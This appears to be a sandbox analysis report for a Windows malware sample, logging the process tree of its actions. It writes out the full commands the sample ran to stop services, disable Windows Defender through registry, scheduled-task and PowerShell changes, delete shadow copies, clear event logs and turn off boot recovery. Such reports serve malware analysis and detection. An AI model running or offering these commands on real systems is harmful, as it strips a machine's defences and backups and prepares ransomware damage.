PID 1668 wrote to memory of 984 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 1668 wrote to memory of 1744 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 1668 wrote to memory of 1744 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 1668 wrote to memory of 1744 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 1668 wrote to memory of 572 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 1668 wrote to memory of 572 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 1668 wrote to memory of 572 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 1668 wrote to memory of 1636 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 1668 wrote to memory of 1636 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 1668 wrote to memory of 1636 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 1668 wrote to memory of 1148 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:648
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1632
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1072
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:664 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1332
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:452 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:752
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1092
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1488
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1532
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1660
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:984
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1744
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:572
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1636
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1148
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1984
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1760
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1312
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1580
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1680
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:516
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1632
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1560
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1964
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:916
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:944
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:872
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1828
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1532
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1176
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1844
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1712
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1936
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:584
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:900
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1592
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:268
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1480
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:892
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:812
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1772
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1496
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1752
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1696
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:676
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:716
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1980
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:340
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1216 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1256
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1708 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:328 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1908 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1940 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:964 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1552 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1396 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:752 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:520
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1188 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1728
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1956 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1188
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1500
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5c015d76fd1f7a457aaebce0d13c2536f
SHA15e8948252f436f59f06609e965a9902f9bc19593
SHA2566d36bdc3d258c6a88907f13c074e87af6dd8b6bd1cfcad8617e1b00919750264
SHA512c2fc649b05792922ca20650145544b65b43e20410c3a81d7e9c39947ded3b5702f9d67bf5c834d3cd5e390938b928cbd789f55041f2cf7eccf54d1ae1ff138b0